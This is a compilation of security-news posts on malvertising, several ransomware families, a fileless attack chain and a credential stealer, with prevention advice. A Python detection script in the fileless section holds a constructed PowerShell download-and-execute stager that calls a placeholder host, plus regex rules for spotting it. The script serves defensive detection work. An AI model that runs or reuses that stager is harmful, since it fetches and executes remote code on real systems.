Malware Advertising Campaign Reached High-Profile Website Visitors

Today the biggest threats to computer systems and user privacy come from malware, which can be of any kind: Trojans, ransomware, browser hijackers and the like. Hackers and cyber criminals never rest or miss an opportunity to harm you. Malware experts recently noticed yet another kind of malware distribution, known as malvertising, which is a technique for spreading malware to website visitors. The process involves seeding ad networks with harmful advertisements, which then appear on the web page you are visiting with the aim of delivering malware to your computer. Experts classify this as an insidious type of attack, since a user merely has to view an advertisement in order to become infected, and this mainly happens when their computer has a software vulnerability.

In recent times a number of high-profile websites, including Java.com, TMZ.com and IBTimes.com, became victims of malware advertising campaigns that spread malware to their visitors. The recent malvertising campaigns were discovered by two security research firms. This highlights the threat from fake advertising networks as well as from legitimate but poorly managed ones. Advertising networks mainly infect victims by taking advantage of redirected web traffic. According to a report by Fox-IT, at least eight to ten websites were found hosting the poisoned ads; Photobucket.com, Kapaza.be, Tvgids.nl, EBay.ie and Deviantart.com were among the targeted sites.

Source:- https://www.scmagazine.com/malvertising-campaign-uses-fake-ad-networks/article/570424/

A Malwarebytes report says one of the campaigns created fake advertising networks on a high-traffic adult website, registered via a proxy. The campaign, dubbed HookAds, always redirected targeted users to spoofed adult web pages to spread malware. The secondary decoy adult websites then attempt to serve the RIG and Neutrino exploit kits in order to deliver their payloads.

A malware advertising campaign involves injecting malicious advertisements into legitimate online advertising networks and web pages. Undoubtedly malvertising is a new concept for spreading malware, and what makes it more interesting is that it does not require any user action, such as clicking on the ad, to compromise the system. Moreover, malvertising does not exploit any vulnerability in the website or server that hosts the ad. Its infection travels silently through web page advertisements.

Malvertising, or the malware advertising campaign, is an extremely new and effective way to target and infect a large number of computer systems within a short period of time. In a talk with SC Media, Malwarebytes Lead Malware Intelligence Analyst Jérôme Segura said that the campaign began in mid-August or earlier. He further said that about one million visitors to the adult websites were exposed to the malvertising campaign, adding “we don’t know that all were infected.”

References:- https://www.scmagazine.com/malicious-ads-impact-javacom-tmz-and-photobucket-site-visitors-firm-finds/article/539542/

A computer system infected with any kind of malicious program is truly painful, as it completely hampers your computer activities, both online and offline. Malvertising is especially dangerous because the malware gets inside your PC even without you clicking on the ad: the ad is loaded by the user’s browser. This malware advertising campaign reached high-profile website visitors, so one needs to be more cautious while browsing. Security experts suggest that users disable any browser plug-ins that are barely used, and make sure the remaining ones are kept updated in order to prevent similar attacks from occurring.

Cobian Trojan Offer Free Kit On Underground Forums

Hackers are trying every possible way to sneak into your system. From creating an app to sending you offers by email, they will try every possibility to fool you and get into your system. They use your own resources against you, and you have no way of knowing it. As cyber experts we strongly recommend that you do not respond to such mails or the malicious applications you come across on the internet. Recently a malware named Cobian Trojan surfaced on the Internet and is mostly used by hackers as a weapon for attack. Some reports clearly mention that the threat is circulating on several underground markets for free and is used by hackers for deceptive purposes.

The Cobian Trojan code is much like a Trojan worm virus that surfaced on the dark web almost four years ago. It covers everything a hacker needs to unlock a system; it is all bells and whistles for cyber criminals, with creepy features like a webcam hijacker, a keylogger, screen capturing ability and, moreover, the freedom for the criminal to run their own code on the compromised system. The irony is that you will be helpless once a hacker introduces such a hacking tool to your system. Cobian Trojan is certainly an advanced virus capable of invading a whole computer network and messing with all of its settings. It can easily bypass all security barriers and enter the system in various ways.


EV Ransomware Targeting WordPress : Attack On Rise

According to researchers, a new computer malware has been found attacking WordPress sites across the globe. A ransomware variant named EV ransomware has emerged that is designed to target only the WordPress sites of its victims. Studies say the malware only aims to lock the WordPress page and deny its owner access, then demands that the publisher pay a sum of money; paying supposedly guarantees restoration of the files and access to them. The WordPress security researchers known as the Wordfence team flagged several attempts by cyber crooks to upload a virus with the ability to encrypt a WordPress website’s files. Once loaded, the ransomware compromises the website. This relatively new breed of ransomware holds WordPress websites hostage and asks for payment for their release. Estimates are that more than $5 million is extorted from victims each year by ransomware. Yet cyber security teams are encouraging victims not to pay the ransom, for two reasons: first, there is no guarantee your data will be returned, and second, it further encourages extortionists to continue ransomware attacks.


SyncCrypt Ransomware Is Globally Distributed Through Spam Wave

A massive growth in ransomware attacks has been seen in 2017, and SyncCrypt ransomware is one of them. It is a complicated file-encrypting threat that was first detected by an Emsisoft researcher in the last week of August 2017. The infection reports and samples of this malware reveal that it is a dangerous threat and users must take it seriously. The rate at which this ransomware is propagated via worldwide spam is also a matter of concern. According to cyber security researchers, it is one of those ransomware families with the ability to make a lot of money, because it not only encrypts user data but can also encode system data as well. The cyber crooks behind this ransomware are using various social engineering tricks so that the targeted users infect their own systems with the SyncCrypt code.

Mamba Ransomware Attack: Targeting Hard Disk Instead of Files

Nowadays a new ransomware named “Mamba Ransomware” is on the rise that paralyzes the target computer and does not allow the user to access the desktop and files. Mamba was the first example of ransomware detected in a public attack that encrypts hard drives rather than files; it primarily targeted organizations in Brazil and the Municipal Transportation Agency of San Francisco. It is a variant of the disk-encryption ransomware that was first observed in early November 2016. Unlike the Petya ransomware, which encrypts the Master File Table (MFT) to revoke access to the data, Mamba uses disk-level encryption. The ransomware is reported to run as a ‘DiskCryptor’ process on the compromised PC.

The way Mamba ransomware propagates among user systems varies, but it is likely that its operators use malicious tools like exploit kits and spam mail loaded with Trojan droppers. As stated above, the ransomware can lock the entire local drive, and researchers are working on finding its weaknesses. Analysis is hindered by the full encryption, which hides most of Mamba. The ransomware may run in the background and encode rarely accessed files first. Then the Mamba cryptomalware proceeds to lock other data and tightens its grip on the drive by encrypting the files you opened during your last session, or on the next system boot. There are other variants of Mamba, such as Black Mamba Ransomware.

Mamba Ransomware Designed To Disrupt Corporations And Other Large Organizations

Security researchers report that the people behind these attacks usually target company offices and other corporate networks in Saudi Arabia and Brazil. It is also expected that the attacks may spread to other countries and regions as well.

The attackers behind the Mamba ransomware attacks leverage the PsExec utility to execute the threat on the corporate network once it has gained a foothold. NotPetya uses the same PsExec tool to spread within target networks. According to Kaspersky, the ransomware uses a two-phase infection pattern: in the first phase, the cyber criminals drop the DiskCryptor tool into a new folder created by the malware. Persistence is obtained by registering a system service called DefragmentService, after which the system is rebooted. The second phase sets up the new bootloader and encrypts the disk partitions using DiskCryptor, after which the machine is rebooted again. The malware also generates a password for the DiskCryptor utility for each machine in the targeted network; the ransomware then uses that password, which is passed through a command-line argument, according to Kaspersky.

After infiltration, the Mamba ransomware modifies the system MBR to display the ransom note. The displayed note, unlike the original Mamba’s, does not state a money demand; instead, affected users are instructed to contact the threat actors at two given email addresses, quoting an ID number. The provided email address is used to recover the encryption key.

As discussed above, Mamba ransomware follows the well-known attack vectors associated with earlier versions. It uses a two-stage infection pattern that first infiltrates the computer network and then does the damage. The hackers’ motive is pre-defined: lock the user’s hard disk and extort money from them. So it is highly recommended to follow prevention steps to avoid such malicious attacks, now and in the future.

Fileless Malware Attacks Against Organizations That Leaves No Signs Of Intrusion

A new malware has been identified by malware researchers that has infected 140 organizations around the world. It is called fileless malware because it injects itself secretly into memory and then leaves no signs of intrusion, which makes detection difficult. The Russia-based Kaspersky Lab has published a report that fileless malware has struck many banks, governments and telecom companies in 40 countries, but it did not give the hackers any specific name.

A fileless malware attack is a non-malware attack in which a hacker uses existing software, approved applications and authorized protocols to carry out malicious activities. These attacks can control the system without downloading any malicious files. It is a variant of malicious software that exists only in the computer’s memory (RAM) and does not write to any part of the computer’s file system. Nothing is installed on the hard drive where it could be picked up by security scans. The attackers simply employed widely used system administration and security tools, including PowerShell, Metasploit and Mimikatz, to inject their malicious code into computer memory.

They hosted their operation on poorly controlled country-code top-level domains such as those of Gabon, the Central African Republic and Mali; the researchers state, “The trick of using such domains is that they are free and missing Whois information after domain expiration.”

“Given that the attackers used the Metasploit Framework, standard Windows utilities and unknown domains with no Whois information, this makes attribution almost impossible,” they conclude. The researchers also add that the groups with the most similar tactics, techniques and procedures are the banking fraud crime groups GCMAN and Carbanak.

Highlights of Fileless Malware Attacks:-

  • A user visits a site using the Firefox browser.
  • On the website, Flash software is loaded.
  • Flash invokes PowerShell, an operating system tool that is part of every Windows computer. It sends instructions through commands that reside in memory.
  • PowerShell connects to the C&C (Command and Control) server and downloads a malicious PowerShell script. Its code hides in memory and steals passwords and other sensitive data belonging to system administrators. This information is sent to the attacker. At no point is a file downloaded to the infected machine’s disk.

After that, the fileless malware attackers obtain further passwords using standard utilities such as Microsoft’s command-line utility NETSH. This tool sends the compromised passwords from the victim’s computer to the attacker’s C&C server, and the attackers gain full access to the computer. Since the malware resides in memory, whenever a victim reboots the system, all traces of the attack disappear. This makes it very difficult to detect and investigate fileless malware and to determine where its attack originated.
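Because the chain above leaves nothing on disk, the place to catch it is process-creation telemetry. The following is an added example, not code from the original post or from the Kaspersky report: it runs three simple rules over constructed Sysmon-style process events (field names and sample events are assumptions): PowerShell spawned by a browser or plugin host, a PowerShell -EncodedCommand that decodes to an in-memory download-and-execute, and netsh launched from PowerShell.

```python
import base64
import ntpath
import re

# Parents that have no business launching PowerShell (assumption: browser hosts).
BROWSER_HOSTS = {"firefox.exe", "plugin-container.exe", "chrome.exe", "iexplore.exe"}
# Markers of a script pulled straight into memory rather than saved to disk.
IN_MEMORY_MARKERS = re.compile(r"IEX|Invoke-Expression|DownloadString|Net\.WebClient", re.I)

# Constructed stager and its UTF-16LE base64 form, the encoding PowerShell's
# -EncodedCommand expects; this is not a sample from the campaign.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/s.ps1')"
ENCODED_STAGER = base64.b64encode(STAGER.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
FF = r"C:\Program Files\Mozilla Firefox"

# Constructed Sysmon-style process-creation events (Event ID 1 fields, simplified).
SAMPLE_EVENTS = [
    {"pid": 4100, "image": FF + r"\firefox.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "firefox.exe"},
    {"pid": 4188, "image": FF + r"\plugin-container.exe", "parent_image": FF + r"\firefox.exe",
     "cmdline": "plugin-container.exe"},
    {"pid": 5012, "image": PS, "parent_image": FF + r"\plugin-container.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -enc " + ENCODED_STAGER},
    {"pid": 5230, "image": r"C:\Windows\System32\netsh.exe", "parent_image": PS,
     "cmdline": "netsh.exe advfirewall show allprofiles"},
    {"pid": 6001, "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe Get-Process"},  # benign admin use, must not fire
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    parts = cmdline.split()
    for i, tok in enumerate(parts[:-1]):
        if tok.lower() in ("-encodedcommand", "-enc", "-ec", "-e"):
            try:
                return base64.b64decode(parts[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyze(events):
    """Apply the three rules and return (pid, rule) findings in event order."""
    findings = []
    for ev in events:
        img = ntpath.basename(ev["image"]).lower()
        parent = ntpath.basename(ev["parent_image"]).lower()
        if img == "powershell.exe":
            if parent in BROWSER_HOSTS:
                findings.append((ev["pid"], "powershell spawned by browser/plugin host"))
            decoded = decode_encoded_command(ev["cmdline"]) or ""
            if IN_MEMORY_MARKERS.search(ev["cmdline"] + " " + decoded):
                findings.append((ev["pid"], "in-memory download/execute in PowerShell"))
        elif img == "netsh.exe" and parent == "powershell.exe":
            findings.append((ev["pid"], "netsh launched from PowerShell"))
    return findings


if __name__ == "__main__":
    for pid, rule in analyze(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

Decoding the -EncodedCommand argument matters because the plain command line carries only base64, so a rule that matches the raw string would miss the stager entirely.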

Prevention And Detection Tips For Fileless Malware:-

Gartner security analyst Avivah Litan says that fileless malware attacks are becoming more common and evade most endpoint protection and detection tools. Litan advises organizations to take the following steps in order to prevent fileless malware attacks.

  • Patch systems often to avoid common vulnerabilities.
  • Limit the use of system administration tools such as Microsoft PowerShell; grant access to those tools only on the basis of reasonable need.
  • Invest in products from reputable companies that add protection against memory attacks.
  • Use application controls on endpoint computers to ensure that only the organization’s approved applications can run.

Therefore, IT professionals and cyber security firms highly recommend that you stop inviting such vulnerable applications into your system, and remove fileless malware promptly and safely to prevent future attacks.


Password Stealing Malware Ovidiy Stealer Sold for $7 On Russian Site

Today computers have become an integral part of our daily life. Not only do they ease our work, they also act as reliable storage media where we store our important details, including credentials such as passwords, banking details and much more. But what if this data is in danger? With the growing importance of computer usage, cyber crime has also increased tremendously in recent years. A few days back we saw the impact of the WannaCry ransomware, which created havoc and affected over a lakh (100,000) computer systems across 150 countries. Recently, yet another dangerous PC threat, not ransomware but one that still cannot be taken lightly, named Ovidiy Stealer, was detected by security experts.


What is ‘Ovidiy Stealer’?

Ovidiy Stealer is a new lightweight, easy-to-use credential stealer that primarily targets the passwords stored in your installed browsers. It was discovered after experts found that a Russian-speaking malware developer known as “TheBottle” had started selling a new infostealer under the name Ovidiy Stealer. This password stealing malware is sold for 450-750 rubles, i.e. $7-$13, on a Russian site. As for its internal design, it comes with a slick UI, including a management panel that makes the tool very easy to use and makes tracking results simple. Moreover, the malware is written in .NET and is currently capable of targeting the following applications: Google Chrome, FileZilla, Kometa, Amigo, Torch, Orbitum and Opera.


Key Features of Ovidiy Stealer:-

Ovidiy Stealer is for sale on a Russian domain. Buyers get access to a web panel that provides an easy-to-use graphical user interface for managing infected hosts. Some of its notable features are listed below:-

Detailed Log Files Collection:- Here you can see all collected log files originating from the compromised hosts.

Template-based Web Panel:- Its web panel configuration module resembles that of dangerous ransomware like Spora and other well-known ransomware families.

Additional Modules Purchase:- The tool allows customers to pay for additional modules and features through a well-developed payment system. The service offered is called “RoboKassa”, which supports payment card transactions and some other services. Here the seller name is listed as “Ovidiy”.

Comments System:- On top of all these features, a comments and feedback system is implemented that allows customers of Ovidiy Stealer to share their feedback.

Source:- Ovidiy Stealer Malware Sold on Russian Site

Dridex Trojan Uses New Zero-Day Exploit in Latest Attacks

Attackers are always active and never miss a single chance to strike a valuable target. The battle between the Dridex Trojan and Microsoft Office is ongoing, and, as mentioned above, the attackers don’t miss a chance to harm a computer user. Dridex now uses a new zero-day exploit in its latest attacks to make things more complex for the computer user. The attack was blended with spam mails containing malicious Microsoft Word document attachments that exploit a vulnerability in the way Microsoft handles OLE2Link objects.

Microsoft OLE2Link Object: the Microsoft OLE2Link object flaw allows an unauthenticated remote attacker to trigger arbitrary code execution on a system through an unspecified action.


WannaCry Ransomware – Essential Mitigations Strategies

On May 12, an epidemic ransomware infection emerged, named WannaCry. Experts called it “the largest ransomware infection in history”; it targeted more than 200,000 computers across 150 countries. WannaCry was launched to target millions of Windows systems and crippled operations. The infection covered a wide region of Europe, ranging from Britain’s national public health service, the NHS, to Telefonica, a telecom company in Spain, to car manufacturers, the shipping giant FedEx and Russian government servers. Millions of average computer users also fell victim to this cyber attack. Security experts said the main targets of the ransomware appeared to be in Russia, Ukraine and Taiwan, but the ransomware includes localized translations in almost 28 languages, from Bulgarian to Vietnamese.


Latest SamSam Ransomware Attack Demands $33,000 From Victim

Ransomware attacks have become common in the past year, and SamSam ransomware has started a new trend in such attacks. The ransomware first arose in 2016 and affected all kinds of organizations as well as individual users. Now it is active once again with more perilous features. According to malware researchers, it comes with a new demand and is now asking for $33,000 to release the encrypted files. The updated variant of SamSam is also different from other ransomware because its attackers generate the RSA key pair themselves and upload the public key along with the ransomware to the targeted computer. Underestimating this threat is not wise: in April 2017 a hospital was attacked by it and refused to pay the ransom, and as a result it took more than a month to fully restore the hospital’s systems.
